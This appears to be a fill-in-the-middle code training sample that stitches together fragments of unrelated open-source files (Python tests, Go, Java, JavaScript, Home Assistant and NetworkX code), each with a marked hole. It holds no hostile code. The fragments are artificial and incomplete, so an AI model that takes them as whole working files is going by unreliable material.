def __init__(self):
self.tempdir = tempfile.mkdtemp()
self.directory = os.path.join(self.tempdir, 'dir')
mkdirp(self.directory)
# Script with short shebang
self.short_shebang = os.path.join(self.tempdir, 'short')
with open(self.short_shebang, 'w') as f:
f.write(short_line)
f.write(last_line)
# Script with long shebang
self.long_shebang = os.path.join(self.tempdir, 'long')
with open(self.long_shebang, 'w') as f:
f.write(long_line)
f.write(last_line)
# Lua script with long shebang
self.lua_shebang = os.path.join(self.tempdir, 'lua')
with open(self.lua_shebang, 'w') as f:
f.write(lua_line)
f.write(last_line)
# Lua script with long shebang
self.lua_textbang = os.path.join(self.tempdir, 'lua_in_text')
with open(self.lua_textbang, 'w') as f:
f.write(short_line)
f.write(lua_in_text)
f.write(last_line)
# Node script with long shebang
self.node_shebang = os.path.join(self.tempdir, 'node')
with open(self.node_shebang, 'w') as f:
f.write(node_line)
f.write(last_line)
# Node script with long shebang
self.node_textbang = os.path.join(self.tempdir, 'node_in_text')
with open(self.node_textbang, 'w') as f:
f.write(short_line)
f.write(node_in_text)
f.write(last_line)
# Script already using sbang.
self.has_sbang = os.path.join(self.tempdir, 'shebang')
with open(self.has_sbang, 'w') as f:
f.write(sbang_line)
f.write(long_line)
f.write(last_line)
# Fake binary file.
self.binary = os.path.join(self.tempdir, 'binary')
tar = which('tar', required=True)
tar('czf', self.binary, self.has_sbang)
def destroy(self):
shutil.rmtree(self.tempdir, ignore_errors=True)
@pytest.fixture
def script_dir():
sdir = ScriptDirectory()
yield sdir
sdir.destroy()
def test_shebang_handling(script_dir):
assert shebang_too_long(script_dir.lua_shebang)
assert shebang_too_long(script_dir.long_shebang)
assert not shebang_too_long(script_dir.short_shebang)
assert not shebang_too_long(script_dir.has_sbang)
assert not shebang_too_long(script_dir.binary)
assert not shebang_too_long(script_dir.directory)
filter_shebangs_in_directory(script_dir.tempdir)
# Make sure this is untouched
with open(script_dir.short_shebang, 'r') as f:
assert f.readline() == short_line
assert f.readline() == last_line
# Make sure this got patched.
with open(script_dir.long_shebang, 'r') as f:
assert f.readline() == sbang_line
assert f.readline() == long_line
assert f.readline() == last_line
# Make sure this got patched.
with open(script_dir.lua_shebang, 'r') as f:
assert f.readline() == sbang_line
assert f.readline() == lua_line_patched
assert f.readline() == last_line
# Make sure this got patched.
with open(script_dir.node_shebang, 'r') as f:
assert f.readline() == sbang_line
assert f.readline() == node_line_patched
assert f.readline() == last_line
assert filecmp.cmp(script_dir.lua_textbang,
os.path.join(script_dir.tempdir, 'lua_in_text'))
assert filecmp.cmp(script_dir.node_textbang,
os.path.join(script_dir.tempdir, 'node_in_text'))
# Make sure this is untouched
with open(script_dir.has_sbang, 'r') as f:
assert f.readline() == sbang_line
assert f.readline() == long_line
assert f.readline() == last_line
def test_shebang_handles_non_writable_files(script_dir):
# make a file non-writable
st = os.stat(script_dir.long_shebang)
not_writable_mode = st.st_mode & ~stat.S_IWRITE
os.chmod(script_dir.long_shebang, not_writable_mode)
test_shebang_handling(script_dir)
st = os.stat(script_dir.long_shebang)
assert oct(not_writable_mode) == oct(st.st_mode)<|fim▁end|> | |
<|file_name|>urls.py<|end_file_name|><|fim▁begin|><|fim▁hole|>from rest_framework import routers
from . import viewsets
router = routers.SimpleRouter()
router.register(r"domains", viewsets.DomainViewSet, basename="domain")
router.register(
r"domainaliases", viewsets.DomainAliasViewSet, basename="domain_alias")
router.register(r"accounts", viewsets.AccountViewSet, basename="account")
router.register(r"aliases", viewsets.AliasViewSet, basename="alias")
router.register(
r"senderaddresses", viewsets.SenderAddressViewSet, basename="sender_address")
urlpatterns = router.urls<|fim▁end|> | """Admin API urls."""
|
<|file_name|>modules.go<|end_file_name|><|fim▁begin|>package native
import (
"errors"
"github.com/CyCoreSystems/ari/v5"
)
// Modules provides the ARI modules accessors for a native client
type Modules struct {
client *Client
}
// Get obtains a lazy handle to an asterisk module
func (m *Modules) Get(key *ari.Key) *ari.ModuleHandle {<|fim▁hole|> return ari.NewModuleHandle(m.client.stamp(key), m)
}
// List lists the modules and returns lists of handles
func (m *Modules) List(filter *ari.Key) (ret []*ari.Key, err error) {
if filter == nil {
filter = ari.NodeKey(m.client.appName, m.client.node)
}
modules := []struct {
Name string `json:"name"`
}{}
err = m.client.get("/asterisk/modules", &modules)
if err != nil {
return nil, err
}
for _, i := range modules {
k := m.client.stamp(ari.NewKey(ari.ModuleKey, i.Name))
if filter.Match(k) {
if filter.Dialog != "" {
k.Dialog = filter.Dialog
}
ret = append(ret, k)
}
}
return
}
// Load loads the named asterisk module
func (m *Modules) Load(key *ari.Key) error {
return m.client.post("/asterisk/modules/"+key.ID, nil, nil)
}
// Reload reloads the named asterisk module
func (m *Modules) Reload(key *ari.Key) error {
return m.client.put("/asterisk/modules/"+key.ID, nil, nil)
}
// Unload unloads the named asterisk module
func (m *Modules) Unload(key *ari.Key) error {
return m.client.del("/asterisk/modules/"+key.ID, nil, "")
}
// Data retrieves the state of the named asterisk module
func (m *Modules) Data(key *ari.Key) (*ari.ModuleData, error) {
if key == nil || key.ID == "" {
return nil, errors.New("module key not supplied")
}
data := new(ari.ModuleData)
if err := m.client.get("/asterisk/modules/"+key.ID, data); err != nil {
return nil, dataGetError(err, "module", "%v", key.ID)
}
data.Key = m.client.stamp(key)
return data, nil
}<|fim▁end|> | |
<|file_name|>eventtrans.py<|end_file_name|><|fim▁begin|>#Author velociraptor Genjix <[email protected]>
from PySide.QtGui import *
from PySide.QtCore import *
class MainWindow(QMainWindow):
def __init__(self):
super(MainWindow, self).__init__()
button = QPushButton(self)
button.setGeometry(QRect(100, 100, 100, 100))
machine = QStateMachine(self)
s1 = QState()
s1.assignProperty(button, 'text', 'Outside')
s2 = QState()
s2.assignProperty(button, 'text', 'Inside')
enterTransition = QEventTransition(button, QEvent.Enter)
enterTransition.setTargetState(s2)
s1.addTransition(enterTransition)
leaveTransition = QEventTransition(button, QEvent.Leave)
leaveTransition.setTargetState(s1)
s2.addTransition(leaveTransition)
s3 = QState()
s3.assignProperty(button, 'text', 'Pressing...')
pressTransition = QEventTransition(button, QEvent.MouseButtonPress)
pressTransition.setTargetState(s3)
s2.addTransition(pressTransition)
releaseTransition = QEventTransition(button, QEvent.MouseButtonRelease)
releaseTransition.setTargetState(s2)
s3.addTransition(releaseTransition)
machine.addState(s1)
machine.addState(s2)
machine.addState(s3)
<|fim▁hole|> self.show()
if __name__ == '__main__':
import sys
app = QApplication(sys.argv)
mainWin = MainWindow()
sys.exit(app.exec_())<|fim▁end|> | machine.setInitialState(s1)
machine.start()
self.setCentralWidget(button) |
<|file_name|>const.py<|end_file_name|><|fim▁begin|>"""Freebox component constants."""
from __future__ import annotations
import socket
from homeassistant.components.sensor import SensorEntityDescription
from homeassistant.const import DATA_RATE_KILOBYTES_PER_SECOND, PERCENTAGE, Platform
DOMAIN = "freebox"
SERVICE_REBOOT = "reboot"
<|fim▁hole|> "app_name": "Home Assistant",
"app_version": "0.106",
"device_name": socket.gethostname(),
}
API_VERSION = "v6"
PLATFORMS = [Platform.BUTTON, Platform.DEVICE_TRACKER, Platform.SENSOR, Platform.SWITCH]
DEFAULT_DEVICE_NAME = "Unknown device"
# to store the cookie
STORAGE_KEY = DOMAIN
STORAGE_VERSION = 1
CONNECTION_SENSORS: tuple[SensorEntityDescription, ...] = (
SensorEntityDescription(
key="rate_down",
name="Freebox download speed",
native_unit_of_measurement=DATA_RATE_KILOBYTES_PER_SECOND,
icon="mdi:download-network",
),
SensorEntityDescription(
key="rate_up",
name="Freebox upload speed",
native_unit_of_measurement=DATA_RATE_KILOBYTES_PER_SECOND,
icon="mdi:upload-network",
),
)
CONNECTION_SENSORS_KEYS: list[str] = [desc.key for desc in CONNECTION_SENSORS]
CALL_SENSORS: tuple[SensorEntityDescription, ...] = (
SensorEntityDescription(
key="missed",
name="Freebox missed calls",
icon="mdi:phone-missed",
),
)
DISK_PARTITION_SENSORS: tuple[SensorEntityDescription, ...] = (
SensorEntityDescription(
key="partition_free_space",
name="free space",
native_unit_of_measurement=PERCENTAGE,
icon="mdi:harddisk",
),
)
# Icons
DEVICE_ICONS = {
"freebox_delta": "mdi:television-guide",
"freebox_hd": "mdi:television-guide",
"freebox_mini": "mdi:television-guide",
"freebox_player": "mdi:television-guide",
"ip_camera": "mdi:cctv",
"ip_phone": "mdi:phone-voip",
"laptop": "mdi:laptop",
"multimedia_device": "mdi:play-network",
"nas": "mdi:nas",
"networking_device": "mdi:network",
"printer": "mdi:printer",
"router": "mdi:router-wireless",
"smartphone": "mdi:cellphone",
"tablet": "mdi:tablet",
"television": "mdi:television",
"vg_console": "mdi:gamepad-variant",
"workstation": "mdi:desktop-tower-monitor",
}<|fim▁end|> | APP_DESC = {
"app_id": "hass", |
<|file_name|>power_measurement_suite_new.py<|end_file_name|><|fim▁begin|>import SCPI
import time
import numpy
totalSamples = 10
sampleFreq = 100
#freq= SCPI.SCPI("172.17.5.121")
dmm = SCPI.SCPI("172.17.5.131")
#setup freq gen
#freq.setSquare()
#freq.setVoltage(0,3)
#freq.setFrequency(sampleFreq)
#setup voltage meter
#dmm.setVoltageDC("10V", "MAX")
# set external trigger
#dmm.setTriggerSource("INT")
#dmm.setTriggerCount(str(totalSamples))
# wait for trigger
dmm.setInitiate()
dmm.setCurrentDC("500mA", "MAX")<|fim▁hole|>dmm.setTriggerCount(str(totalSamples))
dmm.setInitiate()
time.sleep(1)
#freq.setOutput(1)
currentMeasurements = []
#voltageMeasurements = []
while 1:
if len(currentMeasurements) < totalSamples:
currentMeasurements += dmm.getMeasurements()
if (len(currentMeasurements) >= totalSamples):
break
time.sleep(0.1)
#freq.setOutput(0)
s = 0
for i in range(0, totalSamples):
print float(currentMeasurements[i])
#print "Average Power Consumption: ", s/float(totalSamples), "W avg volt: ", numpy.mean(voltageMeasurements), "V avg current: ", numpy.mean(currentMeasurements), "A"<|fim▁end|> | dmm.setTriggerSource("INT") |
<|file_name|>CompleteOperation.java<|end_file_name|><|fim▁begin|>/*
* Copyright 2012 Red Hat, Inc. and/or its affiliates.
*
* Licensed under the Eclipse Public License version 1.0, available at
* http://www.eclipse.org/legal/epl-v10.html
*/
package org.jboss.aesh.complete;
import org.jboss.aesh.console.AeshContext;
import org.jboss.aesh.parser.Parser;
import org.jboss.aesh.terminal.TerminalString;
import java.util.ArrayList;
import java.util.List;
/**
* A payload object to store completion data
*
* @author Ståle W. Pedersen <[email protected]>
*/
public class CompleteOperation {
private String buffer;
private int cursor;
private int offset;
private List<TerminalString> completionCandidates;
private boolean trimmed = false;
private boolean ignoreStartsWith = false;
private String nonTrimmedBuffer;
private AeshContext aeshContext;
private char separator = ' ';
private boolean appendSeparator = true;
private boolean ignoreOffset = false;
public CompleteOperation(AeshContext aeshContext, String buffer, int cursor) {
this.aeshContext = aeshContext;
setCursor(cursor);
setSeparator(' ');
doAppendSeparator(true);
completionCandidates = new ArrayList<>();
setBuffer(buffer);
}
public String getBuffer() {
return buffer;
}
private void setBuffer(String buffer) {
if(buffer != null && buffer.startsWith(" ")) {
trimmed = true;
this.buffer = Parser.trimInFront(buffer);
nonTrimmedBuffer = buffer;
setCursor(cursor - getTrimmedSize());
}
else
this.buffer = buffer;
}
public boolean isTrimmed() {
return trimmed;
}
public int getTrimmedSize() {
return nonTrimmedBuffer.length() - buffer.length();
}
public String getNonTrimmedBuffer() {
return nonTrimmedBuffer;
}
public int getCursor() {
return cursor;
}
private void setCursor(int cursor) {
if(cursor < 0)
this.cursor = 0;
else
this.cursor = cursor;
}
public int getOffset() {
return offset;
}
public void setOffset(int offset) {
this.offset = offset;
}
public void setIgnoreOffset(boolean ignoreOffset) {
this.ignoreOffset = ignoreOffset;
}
public boolean doIgnoreOffset() {
return ignoreOffset;
}
public AeshContext getAeshContext() {
return aeshContext;
}
/**
* Get the separator character, by default its space
*
* @return separator
*/
public char getSeparator() {
return separator;
}
/**
* By default the separator is one space char, but
* it can be overridden here.
*
* @param separator separator
*/
public void setSeparator(char separator) {
this.separator = separator;
}
/**
* Do this completion allow for appending a separator
* after completion? By default this is true.
*
* @return appendSeparator
*/
public boolean hasAppendSeparator() {
return appendSeparator;
}
/**
* Set if this CompletionOperation would allow an separator to<|fim▁hole|> public void doAppendSeparator(boolean appendSeparator) {
this.appendSeparator = appendSeparator;
}
public List<TerminalString> getCompletionCandidates() {
return completionCandidates;
}
public void setCompletionCandidates(List<String> completionCandidates) {
addCompletionCandidates(completionCandidates);
}
public void setCompletionCandidatesTerminalString(List<TerminalString> completionCandidates) {
this.completionCandidates = completionCandidates;
}
public void addCompletionCandidate(TerminalString completionCandidate) {
this.completionCandidates.add(completionCandidate);
}
public void addCompletionCandidate(String completionCandidate) {
addStringCandidate(completionCandidate);
}
public void addCompletionCandidates(List<String> completionCandidates) {
addStringCandidates(completionCandidates);
}
public void addCompletionCandidatesTerminalString(List<TerminalString> completionCandidates) {
this.completionCandidates.addAll(completionCandidates);
}
public void removeEscapedSpacesFromCompletionCandidates() {
Parser.switchEscapedSpacesToSpacesInTerminalStringList(getCompletionCandidates());
}
private void addStringCandidate(String completionCandidate) {
this.completionCandidates.add(new TerminalString(completionCandidate, true));
}
private void addStringCandidates(List<String> completionCandidates) {
for(String s : completionCandidates)
addStringCandidate(s);
}
public List<String> getFormattedCompletionCandidates() {
List<String> fixedCandidates = new ArrayList<String>(completionCandidates.size());
for(TerminalString c : completionCandidates) {
if(!ignoreOffset && offset < cursor) {
int pos = cursor - offset;
if(c.getCharacters().length() >= pos)
fixedCandidates.add(c.getCharacters().substring(pos));
else
fixedCandidates.add("");
}
else {
fixedCandidates.add(c.getCharacters());
}
}
return fixedCandidates;
}
public List<TerminalString> getFormattedCompletionCandidatesTerminalString() {
List<TerminalString> fixedCandidates = new ArrayList<TerminalString>(completionCandidates.size());
for(TerminalString c : completionCandidates) {
if(!ignoreOffset && offset < cursor) {
int pos = cursor - offset;
if(c.getCharacters().length() >= pos) {
TerminalString ts = c;
ts.setCharacters(c.getCharacters().substring(pos));
fixedCandidates.add(ts);
}
else
fixedCandidates.add(new TerminalString("", true));
}
else {
fixedCandidates.add(c);
}
}
return fixedCandidates;
}
public String getFormattedCompletion(String completion) {
if(offset < cursor) {
int pos = cursor - offset;
if(completion.length() > pos)
return completion.substring(pos);
else
return "";
}
else
return completion;
}
public boolean isIgnoreStartsWith() {
return ignoreStartsWith;
}
public void setIgnoreStartsWith(boolean ignoreStartsWith) {
this.ignoreStartsWith = ignoreStartsWith;
}
@Override
public String toString() {
StringBuilder sb = new StringBuilder();
sb.append("Buffer: ").append(buffer)
.append(", Cursor:").append(cursor)
.append(", Offset:").append(offset)
.append(", IgnoreOffset:").append(ignoreOffset)
.append(", Append separator: ").append(appendSeparator)
.append(", Candidates:").append(completionCandidates);
return sb.toString();
}
}<|fim▁end|> | * be appended. By default this is true.
*
* @param appendSeparator appendSeparator
*/ |
<|file_name|>link_prediction.py<|end_file_name|><|fim▁begin|>"""
Link prediction algorithms.
"""
from math import log
import networkx as nx
from networkx.utils import not_implemented_for<|fim▁hole|>
__all__ = ['resource_allocation_index',
'jaccard_coefficient',
'adamic_adar_index',
'preferential_attachment',
'cn_soundarajan_hopcroft',
'ra_index_soundarajan_hopcroft',
'within_inter_cluster']
def _apply_prediction(G, func, ebunch=None):
"""Applies the given function to each edge in the specified iterable
of edges.
`G` is an instance of :class:`networkx.Graph`.
`func` is a function on two inputs, each of which is a node in the
graph. The function can return anything, but it should return a
value representing a prediction of the likelihood of a "link"
joining the two nodes.
`ebunch` is an iterable of pairs of nodes. If not specified, all
non-edges in the graph `G` will be used.
"""
if ebunch is None:
ebunch = nx.non_edges(G)
return ((u, v, func(u, v)) for u, v in ebunch)
@not_implemented_for('directed')
@not_implemented_for('multigraph')
def resource_allocation_index(G, ebunch=None):
r"""Compute the resource allocation index of all node pairs in ebunch.
Resource allocation index of `u` and `v` is defined as
.. math::
\sum_{w \in \Gamma(u) \cap \Gamma(v)} \frac{1}{|\Gamma(w)|}
where $\Gamma(u)$ denotes the set of neighbors of $u$.
Parameters
----------
G : graph
A NetworkX undirected graph.
ebunch : iterable of node pairs, optional (default = None)
Resource allocation index will be computed for each pair of
nodes given in the iterable. The pairs must be given as
2-tuples (u, v) where u and v are nodes in the graph. If ebunch
is None then all non-existent edges in the graph will be used.
Default value: None.
Returns
-------
piter : iterator
An iterator of 3-tuples in the form (u, v, p) where (u, v) is a
pair of nodes and p is their resource allocation index.
Examples
--------
>>> import networkx as nx
>>> G = nx.complete_graph(5)
>>> preds = nx.resource_allocation_index(G, [(0, 1), (2, 3)])
>>> for u, v, p in preds:
... '(%d, %d) -> %.8f' % (u, v, p)
...
'(0, 1) -> 0.75000000'
'(2, 3) -> 0.75000000'
References
----------
.. [1] T. Zhou, L. Lu, Y.-C. Zhang.
Predicting missing links via local information.
Eur. Phys. J. B 71 (2009) 623.
https://arxiv.org/pdf/0901.0553.pdf
"""
def predict(u, v):
return sum(1 / G.degree(w) for w in nx.common_neighbors(G, u, v))
return _apply_prediction(G, predict, ebunch)
@not_implemented_for('directed')
@not_implemented_for('multigraph')
def jaccard_coefficient(G, ebunch=None):
r"""Compute the Jaccard coefficient of all node pairs in ebunch.
Jaccard coefficient of nodes `u` and `v` is defined as
.. math::
\frac{|\Gamma(u) \cap \Gamma(v)|}{|\Gamma(u) \cup \Gamma(v)|}
where $\Gamma(u)$ denotes the set of neighbors of $u$.
Parameters
----------
G : graph
A NetworkX undirected graph.
ebunch : iterable of node pairs, optional (default = None)
Jaccard coefficient will be computed for each pair of nodes
given in the iterable. The pairs must be given as 2-tuples
(u, v) where u and v are nodes in the graph. If ebunch is None
then all non-existent edges in the graph will be used.
Default value: None.
Returns
-------
piter : iterator
An iterator of 3-tuples in the form (u, v, p) where (u, v) is a
pair of nodes and p is their Jaccard coefficient.
Examples
--------
>>> import networkx as nx
>>> G = nx.complete_graph(5)
>>> preds = nx.jaccard_coefficient(G, [(0, 1), (2, 3)])
>>> for u, v, p in preds:
... '(%d, %d) -> %.8f' % (u, v, p)
...
'(0, 1) -> 0.60000000'
'(2, 3) -> 0.60000000'
References
----------
.. [1] D. Liben-Nowell, J. Kleinberg.
The Link Prediction Problem for Social Networks (2004).
http://www.cs.cornell.edu/home/kleinber/link-pred.pdf
"""
def predict(u, v):
union_size = len(set(G[u]) | set(G[v]))
if union_size == 0:
return 0
return len(list(nx.common_neighbors(G, u, v))) / union_size
return _apply_prediction(G, predict, ebunch)
@not_implemented_for('directed')
@not_implemented_for('multigraph')
def adamic_adar_index(G, ebunch=None):
r"""Compute the Adamic-Adar index of all node pairs in ebunch.
Adamic-Adar index of `u` and `v` is defined as
.. math::
\sum_{w \in \Gamma(u) \cap \Gamma(v)} \frac{1}{\log |\Gamma(w)|}
where $\Gamma(u)$ denotes the set of neighbors of $u$.
This index leads to zero-division for nodes only connected via self-loops.
It is intended to be used when no self-loops are present.
Parameters
----------
G : graph
NetworkX undirected graph.
ebunch : iterable of node pairs, optional (default = None)
Adamic-Adar index will be computed for each pair of nodes given
in the iterable. The pairs must be given as 2-tuples (u, v)
where u and v are nodes in the graph. If ebunch is None then all
non-existent edges in the graph will be used.
Default value: None.
Returns
-------
piter : iterator
An iterator of 3-tuples in the form (u, v, p) where (u, v) is a
pair of nodes and p is their Adamic-Adar index.
Examples
--------
>>> import networkx as nx
>>> G = nx.complete_graph(5)
>>> preds = nx.adamic_adar_index(G, [(0, 1), (2, 3)])
>>> for u, v, p in preds:
... '(%d, %d) -> %.8f' % (u, v, p)
...
'(0, 1) -> 2.16404256'
'(2, 3) -> 2.16404256'
References
----------
.. [1] D. Liben-Nowell, J. Kleinberg.
The Link Prediction Problem for Social Networks (2004).
http://www.cs.cornell.edu/home/kleinber/link-pred.pdf
"""
def predict(u, v):
return sum(1 / log(G.degree(w)) for w in nx.common_neighbors(G, u, v))
return _apply_prediction(G, predict, ebunch)
@not_implemented_for('directed')
@not_implemented_for('multigraph')
def preferential_attachment(G, ebunch=None):
r"""Compute the preferential attachment score of all node pairs in ebunch.
Preferential attachment score of `u` and `v` is defined as
.. math::
|\Gamma(u)| |\Gamma(v)|
where $\Gamma(u)$ denotes the set of neighbors of $u$.
Parameters
----------
G : graph
NetworkX undirected graph.
ebunch : iterable of node pairs, optional (default = None)
Preferential attachment score will be computed for each pair of
nodes given in the iterable. The pairs must be given as
2-tuples (u, v) where u and v are nodes in the graph. If ebunch
is None then all non-existent edges in the graph will be used.
Default value: None.
Returns
-------
piter : iterator
An iterator of 3-tuples in the form (u, v, p) where (u, v) is a
pair of nodes and p is their preferential attachment score.
Examples
--------
>>> import networkx as nx
>>> G = nx.complete_graph(5)
>>> preds = nx.preferential_attachment(G, [(0, 1), (2, 3)])
>>> for u, v, p in preds:
... '(%d, %d) -> %d' % (u, v, p)
...
'(0, 1) -> 16'
'(2, 3) -> 16'
References
----------
.. [1] D. Liben-Nowell, J. Kleinberg.
The Link Prediction Problem for Social Networks (2004).
http://www.cs.cornell.edu/home/kleinber/link-pred.pdf
"""
def predict(u, v):
return G.degree(u) * G.degree(v)
return _apply_prediction(G, predict, ebunch)
@not_implemented_for('directed')
@not_implemented_for('multigraph')
def cn_soundarajan_hopcroft(G, ebunch=None, community='community'):
r"""Count the number of common neighbors of all node pairs in ebunch
using community information.
For two nodes $u$ and $v$, this function computes the number of
common neighbors and bonus one for each common neighbor belonging to
the same community as $u$ and $v$. Mathematically,
.. math::
|\Gamma(u) \cap \Gamma(v)| + \sum_{w \in \Gamma(u) \cap \Gamma(v)} f(w)
where $f(w)$ equals 1 if $w$ belongs to the same community as $u$
and $v$ or 0 otherwise and $\Gamma(u)$ denotes the set of
neighbors of $u$.
Parameters
----------
G : graph
A NetworkX undirected graph.
ebunch : iterable of node pairs, optional (default = None)
The score will be computed for each pair of nodes given in the
iterable. The pairs must be given as 2-tuples (u, v) where u
and v are nodes in the graph. If ebunch is None then all
non-existent edges in the graph will be used.
Default value: None.
community : string, optional (default = 'community')
Nodes attribute name containing the community information.
G[u][community] identifies which community u belongs to. Each
node belongs to at most one community. Default value: 'community'.
Returns
-------
piter : iterator
An iterator of 3-tuples in the form (u, v, p) where (u, v) is a
pair of nodes and p is their score.
Examples
--------
>>> import networkx as nx
>>> G = nx.path_graph(3)
>>> G.nodes[0]['community'] = 0
>>> G.nodes[1]['community'] = 0
>>> G.nodes[2]['community'] = 0
>>> preds = nx.cn_soundarajan_hopcroft(G, [(0, 2)])
>>> for u, v, p in preds:
... '(%d, %d) -> %d' % (u, v, p)
'(0, 2) -> 2'
References
----------
.. [1] Sucheta Soundarajan and John Hopcroft.
Using community information to improve the precision of link
prediction methods.
In Proceedings of the 21st international conference companion on
World Wide Web (WWW '12 Companion). ACM, New York, NY, USA, 607-608.
http://doi.acm.org/10.1145/2187980.2188150
"""
def predict(u, v):
Cu = _community(G, u, community)
Cv = _community(G, v, community)
cnbors = list(nx.common_neighbors(G, u, v))
neighbors = (sum(_community(G, w, community) == Cu for w in cnbors)
if Cu == Cv else 0)
return len(cnbors) + neighbors
return _apply_prediction(G, predict, ebunch)
@not_implemented_for('directed')
@not_implemented_for('multigraph')
def ra_index_soundarajan_hopcroft(G, ebunch=None, community='community'):
r"""Compute the resource allocation index of all node pairs in
ebunch using community information.
For two nodes $u$ and $v$, this function computes the resource
allocation index considering only common neighbors belonging to the
same community as $u$ and $v$. Mathematically,
.. math::
\sum_{w \in \Gamma(u) \cap \Gamma(v)} \frac{f(w)}{|\Gamma(w)|}
where $f(w)$ equals 1 if $w$ belongs to the same community as $u$
and $v$ or 0 otherwise and $\Gamma(u)$ denotes the set of
neighbors of $u$.
Parameters
----------
G : graph
A NetworkX undirected graph.
ebunch : iterable of node pairs, optional (default = None)
The score will be computed for each pair of nodes given in the
iterable. The pairs must be given as 2-tuples (u, v) where u
and v are nodes in the graph. If ebunch is None then all
non-existent edges in the graph will be used.
Default value: None.
community : string, optional (default = 'community')
Nodes attribute name containing the community information.
G[u][community] identifies which community u belongs to. Each
node belongs to at most one community. Default value: 'community'.
Returns
-------
piter : iterator
An iterator of 3-tuples in the form (u, v, p) where (u, v) is a
pair of nodes and p is their score.
Examples
--------
>>> import networkx as nx
>>> G = nx.Graph()
>>> G.add_edges_from([(0, 1), (0, 2), (1, 3), (2, 3)])
>>> G.nodes[0]['community'] = 0
>>> G.nodes[1]['community'] = 0
>>> G.nodes[2]['community'] = 1
>>> G.nodes[3]['community'] = 0
>>> preds = nx.ra_index_soundarajan_hopcroft(G, [(0, 3)])
>>> for u, v, p in preds:
... '(%d, %d) -> %.8f' % (u, v, p)
'(0, 3) -> 0.50000000'
References
----------
.. [1] Sucheta Soundarajan and John Hopcroft.
Using community information to improve the precision of link
prediction methods.
In Proceedings of the 21st international conference companion on
World Wide Web (WWW '12 Companion). ACM, New York, NY, USA, 607-608.
http://doi.acm.org/10.1145/2187980.2188150
"""
def predict(u, v):
Cu = _community(G, u, community)
Cv = _community(G, v, community)
if Cu != Cv:
return 0
cnbors = nx.common_neighbors(G, u, v)
return sum(1 / G.degree(w) for w in cnbors
if _community(G, w, community) == Cu)
return _apply_prediction(G, predict, ebunch)
@not_implemented_for('directed')
@not_implemented_for('multigraph')
def within_inter_cluster(G, ebunch=None, delta=0.001, community='community'):
"""Compute the ratio of within- and inter-cluster common neighbors
of all node pairs in ebunch.
For two nodes `u` and `v`, if a common neighbor `w` belongs to the
same community as them, `w` is considered as within-cluster common
neighbor of `u` and `v`. Otherwise, it is considered as
inter-cluster common neighbor of `u` and `v`. The ratio between the
size of the set of within- and inter-cluster common neighbors is
defined as the WIC measure. [1]_
Parameters
----------
G : graph
A NetworkX undirected graph.
ebunch : iterable of node pairs, optional (default = None)
The WIC measure will be computed for each pair of nodes given in
the iterable. The pairs must be given as 2-tuples (u, v) where
u and v are nodes in the graph. If ebunch is None then all
non-existent edges in the graph will be used.
Default value: None.
delta : float, optional (default = 0.001)
Value to prevent division by zero in case there is no
inter-cluster common neighbor between two nodes. See [1]_ for
details. Default value: 0.001.
community : string, optional (default = 'community')
Nodes attribute name containing the community information.
G[u][community] identifies which community u belongs to. Each
node belongs to at most one community. Default value: 'community'.
Returns
-------
piter : iterator
An iterator of 3-tuples in the form (u, v, p) where (u, v) is a
pair of nodes and p is their WIC measure.
Examples
--------
>>> import networkx as nx
>>> G = nx.Graph()
>>> G.add_edges_from([(0, 1), (0, 2), (0, 3), (1, 4), (2, 4), (3, 4)])
>>> G.nodes[0]['community'] = 0
>>> G.nodes[1]['community'] = 1
>>> G.nodes[2]['community'] = 0
>>> G.nodes[3]['community'] = 0
>>> G.nodes[4]['community'] = 0
>>> preds = nx.within_inter_cluster(G, [(0, 4)])
>>> for u, v, p in preds:
... '(%d, %d) -> %.8f' % (u, v, p)
...
'(0, 4) -> 1.99800200'
>>> preds = nx.within_inter_cluster(G, [(0, 4)], delta=0.5)
>>> for u, v, p in preds:
... '(%d, %d) -> %.8f' % (u, v, p)
...
'(0, 4) -> 1.33333333'
References
----------
.. [1] Jorge Carlos Valverde-Rebaza and Alneu de Andrade Lopes.
Link prediction in complex networks based on cluster information.
In Proceedings of the 21st Brazilian conference on Advances in
Artificial Intelligence (SBIA'12)
https://doi.org/10.1007/978-3-642-34459-6_10
"""
if delta <= 0:
raise nx.NetworkXAlgorithmError('Delta must be greater than zero')
def predict(u, v):
Cu = _community(G, u, community)
Cv = _community(G, v, community)
if Cu != Cv:
return 0
cnbors = set(nx.common_neighbors(G, u, v))
within = set(w for w in cnbors
if _community(G, w, community) == Cu)
inter = cnbors - within
return len(within) / (len(inter) + delta)
return _apply_prediction(G, predict, ebunch)
def _community(G, u, community):
"""Get the community of the given node."""
node_u = G.nodes[u]
try:
return node_u[community]
except KeyError:
raise nx.NetworkXAlgorithmError('No community information')<|fim▁end|> | |
<|file_name|>application.js<|end_file_name|><|fim▁begin|>import Ember from 'ember';
import DS from 'ember-data';
import DataAdapterMixin from 'ember-simple-auth/mixins/data-adapter-mixin';
export default DS.RESTAdapter.extend(DataAdapterMixin, {
authorizer: 'authorizer:dspace',
initENVProperties: Ember.on('init', function() {
let ENV = this.container.lookupFactory('config:environment');
if (Ember.isPresent(ENV.namespace)) {
this.set('namespace', ENV.namespace);
}
if (Ember.isPresent(ENV.host)) {
this.set('host', ENV.host);
}
}),
//coalesceFindRequests: true, -> commented out, because it only works for some endpoints (e.g. items) and not others (e.g. communities)
ajax(url, type, hash) {
if (Ember.isEmpty(hash)) {
hash = {};
}
if (Ember.isEmpty(hash.data)) {
hash.data = {};
}
if (type === "GET") {<|fim▁hole|>});<|fim▁end|> | hash.data.expand = 'all'; //add ?expand=all to all GET calls
}
return this._super(url, type, hash);
} |
<|file_name|>floatingip.py<|end_file_name|><|fim▁begin|># Copyright 2016 Sungard Availability Services
# Copyright 2016 Red Hat
# Copyright 2012 eNovance <[email protected]>
# Copyright 2013 IBM Corp
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#<|fim▁hole|># License for the specific language governing permissions and limitations
# under the License.
from oslo_config import cfg
from oslo_log import log
from oslo_utils import timeutils
from ceilometer.agent import plugin_base
from ceilometer.i18n import _LW
from ceilometer import neutron_client
from ceilometer import sample
LOG = log.getLogger(__name__)
cfg.CONF.import_group('service_types', 'ceilometer.neutron_client')
class FloatingIPPollster(plugin_base.PollsterBase):
STATUS = {
'inactive': 0,
'active': 1,
'pending_create': 2,
}
def __init__(self):
self.neutron_cli = neutron_client.Client()
@property
def default_discovery(self):
return 'endpoint:%s' % cfg.CONF.service_types.neutron
@staticmethod
def _form_metadata_for_fip(fip):
"""Return a metadata dictionary for the fip usage data."""
